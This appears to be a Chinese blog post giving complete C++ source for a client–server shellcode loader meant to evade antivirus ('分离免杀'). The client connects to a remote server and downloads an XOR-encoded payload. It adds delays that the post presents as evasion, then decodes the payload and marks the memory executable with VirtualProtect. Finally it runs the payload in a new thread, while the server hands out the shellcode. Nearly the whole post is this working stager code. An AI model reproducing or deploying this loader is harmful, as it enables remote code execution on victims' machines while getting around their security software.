• 实现:远程加载shellcode实现分离免杀


    客户端:

    #include <stdio.h>
    #include <iostream>
    #include <WinSock2.h>
    #pragma comment(lib, "ws2_32.lib")  //添加ws2_32动态库
    #pragma warning(disable:4996) //忽略旧函数使用的警告
    
    using namespace std;
    
    int main(int argc, char *argv[])
    {
    	const int BUF_SIZE = 1024;
    
    	WSADATA			wsd; //WSADATA变量
    	SOCKET			sHost; // 服务器套接字socket
    	SOCKADDR_IN		servAddr; //服务器地址
    	char			buf[BUF_SIZE]; // 存放发送的数据缓冲区
    	char			bufRecv[BUF_SIZE]; //接收收到的数据缓冲区
    	DWORD			dwThreadId;
    	HANDLE			hThread;
    	DWORD			dwOldProtect;
    
    	int retVal; // 返回值
    
    	if (argc <= 2){
    		cout << "USAGE: client.exe <Server IP> <Server PORT>" << endl;
    		return -1;
    	}
    
    	if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) //初始化套结字动态库
    	{
    		cout << "WSAStartup failed!" << endl;
    		return -1;
    	}
    
    	sHost = socket(AF_INET, SOCK_STREAM, 0); //创建套接字 IPV4  可靠的,双向的类型服务提供商选择
    	if (INVALID_SOCKET == sHost)
    	{
    		cout << "socket failed!" << endl;
    		WSACleanup();
    		return  -1;
    	}
    
    	//设置服务器的地址
    	servAddr.sin_family = AF_INET; //指定IPV4
    	servAddr.sin_addr.s_addr = inet_addr(argv[1]); // 指定服务器的地址
    	servAddr.sin_port = htons((short)atoi(argv[2])); // 指定服务器的端口
    
    
    
    	retVal = connect(sHost, (LPSOCKADDR)&servAddr, sizeof(servAddr)); // 套接字 sockaddr的指针,也就是地址 第三个参数为SOCKADDR_IN结构体的大小
    	if (SOCKET_ERROR == retVal) //判断是否连接成功
    	{
    		cout << "connect failed!" << endl;
    		closesocket(sHost);
    		WSACleanup();
    		return -1;
    	}
    	ZeroMemory(buf, BUF_SIZE); // buf指向的地址用0来填充
    	strcpy(buf, "ok"); //给ok两个字节的字符串复制给buf区段
    
    	retVal = send(sHost, buf, strlen(buf), 0); //send的返回值
    
    	if (SOCKET_ERROR == retVal) //判断是否发送成功
    	{
    		cout << "send failed!" << endl;
    		closesocket(sHost);
    		WSACleanup();
    		return -1;
    	}
    	cout << "Starting Download Payload" << endl;
    	ZeroMemory(bufRecv, BUF_SIZE); // bufRevc指向的地址用0来填充
    	Sleep(2000); //延迟两秒起到免杀绕过的效果
    
    
    	recv(sHost, bufRecv, BUF_SIZE, 0); //bufRecv缓冲区接收 服务端发送来的数据
    
    	Sleep(4000);
    	closesocket(sHost);
    	WSACleanup();
    	for (int i = 0; i < sizeof(bufRecv); i++) { //采取倾旋的方式来进行异或解密
    		//Sleep(50);
    		_InterlockedXor8(bufRecv + i, 10);
    	}
    	cout << "加载shellcode中" << endl;
    
    	//下面就是开辟内存存储shellcode 创建线程进行执行
    	char * shellcode = (char *)VirtualAlloc(
    		NULL,
    		BUF_SIZE,
    		MEM_COMMIT,
    		PAGE_READWRITE // 只申请可读可写
    	);
    
    	CopyMemory(shellcode, bufRecv, BUF_SIZE);
    	VirtualProtect(shellcode, BUF_SIZE, PAGE_EXECUTE, &dwOldProtect); // VirtualProtect改变它的属性 -> 可执行
    
    	hThread = CreateThread(
    		NULL, // 安全描述符
    		NULL, // 栈的大小
    		(LPTHREAD_START_ROUTINE)shellcode, // 函数
    		NULL, // 参数
    		NULL, // 线程标志
    		&dwThreadId // 线程ID
    	);
    
    	WaitForSingleObject(hThread, INFINITE);
    	return 0;
    }
    

    服务端:

    #include <WinSock2.h>
    #include <iostream>
    #pragma comment(lib, "ws2_32.lib")
    
    using namespace std;
    
    
    int main(int argc, char* argv[])
    {
    	const int BUF_SIZE = 1024;
    	WSADATA         wsd;            //WSADATA变量
    	SOCKET          sServer;        //服务器套接字
    	SOCKET          sClient;        //客户端套接字
    	SOCKADDR_IN     addrServ;;      //服务器地址
    	char            buf[BUF_SIZE];  //接收数据缓冲区
    	char		sendBuf[] = "你的shellcode"; //或者可以是倾旋用的xor加密方式来进行加密
    	int             retVal;         //返回值
    
    	if (argc <= 1){
    		cout << "USAGE: server.exe <Listen Port>" << endl;
    		return -1;
    	}
    
    	if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)//初始化套结字动态库
    	{
    		cout << "WSAStartup failed!" << endl;
    		return 1;
    	}
    
    	//创建套接字
    	sServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    	if (INVALID_SOCKET == sServer)
    	{
    		cout << "Socket Failed!" << endl;
    		WSACleanup();//释放套接字资源;
    		return  -1;
    	}
    
    	//服务器套接字地址
    	addrServ.sin_family = AF_INET;
    	addrServ.sin_port = htons((short)atoi(argv[1]));;
    	addrServ.sin_addr.s_addr = htonl(INADDR_ANY);
    
    	//绑定套接字
    	retVal = bind(sServer, (LPSOCKADDR)&addrServ, sizeof(SOCKADDR_IN));
    	if (SOCKET_ERROR == retVal)
    	{
    		cout << "Bind Failed!" << endl;
    		closesocket(sServer);   //关闭套接字
    		WSACleanup();           //释放套接字资源;
    		return -1;
    	}
    
    	//开始监听 
    	retVal = listen(sServer, 1);
    	if (SOCKET_ERROR == retVal)
    	{
    		cout << "Listen Failed!" << endl;
    		closesocket(sServer);   //关闭套接字
    		WSACleanup();           //释放套接字资源;
    		return -1;
    	}
    	cout << "开始监听中...." << endl;
    
    	//接受客户端请求
    	sockaddr_in addrClient;
    	int addrClientlen = sizeof(addrClient);
    	sClient = accept(sServer, (sockaddr FAR*)&addrClient, &addrClientlen); // 生成对应当前客户端连接的套接字sClient
    	if (INVALID_SOCKET == sClient)
    	{
    		cout << "Accept Failed!" << endl;
    		closesocket(sServer);   //关闭套接字
    		WSACleanup();           //释放套接字资源;
    		return -1;
    	}
    
    	int flag = 1; //只接收一次
    	while (flag)
    	{
    		//接收客户端数据
    		ZeroMemory(buf, BUF_SIZE); // 填充为0 防止内存分配发生意外
    
    		retVal = recv(sClient, buf, BUF_SIZE, 0); // 接收数据放在buf缓冲区
    
    		if (SOCKET_ERROR == retVal) //判断是否接收错误
    		{
    			cout << "Recv Failed!" << endl;
    			closesocket(sServer);   //关闭套接字
    			closesocket(sClient);   //关闭套接字     
    			WSACleanup();           //释放套接字资源;
    			return -1;
    		}
    		if (buf[0] == '0')
    			break;
    
    		cout << "成功建立通信" << endl;
    		send(sClient, sendBuf, sizeof(sendBuf), 0);
    		cout << "向客户端发送shellcode..." << endl;
    		cout << "发送shellcode成功!" << endl;
    		flag = 0;
    
    	}
    	//退出
    	closesocket(sServer);   //关闭套接字
    	closesocket(sClient);   //关闭套接字
    	WSACleanup();           //释放套接字资源;
    
    	return 0;
    }
    

    参考文章:https://payloads.online/archivers/2019-11-10/2

  • 相关阅读:
    【电商项目】切图仔——神器插件cutterman
    免费服务器存网站步骤
    【电商项目】代码规范——命名推荐
    【电商项目】图标放在哪个元素里面,字体图标偏下处理方法
    【电商项目】小竖线做法
    iconfont阿里字体使用
    类的成分之三构造器
    面向对象的封装性及权限修饰符
    方法的参数值传递机制
    匿名类对象及可变个数形参的方法
  • 原文地址:https://www.cnblogs.com/zpchcbd/p/12170851.html
Copyright © 2020-2023  润新知